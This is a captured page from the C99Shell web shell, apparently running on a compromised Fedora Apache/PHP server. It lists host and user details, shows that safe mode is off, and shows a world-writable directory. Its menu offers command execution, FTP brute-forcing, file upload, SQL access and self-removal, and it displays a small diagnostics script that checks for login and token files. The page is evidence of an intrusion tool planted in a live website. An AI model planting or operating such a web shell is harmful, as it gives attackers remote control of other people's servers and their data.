!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mina/manage/temp/   drwxrwxrwx
Free 2.08 GB of 27.03 GB (7.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     diag.php (974 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
error_reporting
(E_ALL); ini_set('display_errors', 1);
header('Content-Type: text/plain');

echo
"Diagnostics\n\n";
echo
"HTTPS: " . (($_SERVER['HTTPS'] ?? '') ? 'on' : 'off') . "\n";
echo
"curl_init: " . (function_exists('curl_init') ? 'yes' : 'no (enable php-curl)') . "\n";
echo
"DOMDocument: " . (class_exists('DOMDocument') ? 'yes' : 'no (enable php-xml)') . "\n";

$dir = __DIR__ . '/storage';
if (!
is_dir($dir)) {
    
$mk = @mkdir($dir, 0775, true);
    echo
"mkdir(storage): " . ($mk ? 'created' : 'failed (permissions)') . "\n";
} else {
    echo
"storage dir: exists\n";
}
$test = @file_put_contents($dir.'/writetest.txt', 'ok');
echo
"write test: " . ($test !== false ? 'ok' : 'failed (permissions)') . "\n";

echo
"\nFiles present:\n";
foreach ([
'auth_token.php','cookie_utils.php','login_flow.php','index.html','setup_env.php','config.php'] as $f) {
    echo
str_pad($f, 18) . ': ' . (is_file(__DIR__.'/'.$f) ? 'yes' : 'no') . "\n";
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0037 ]--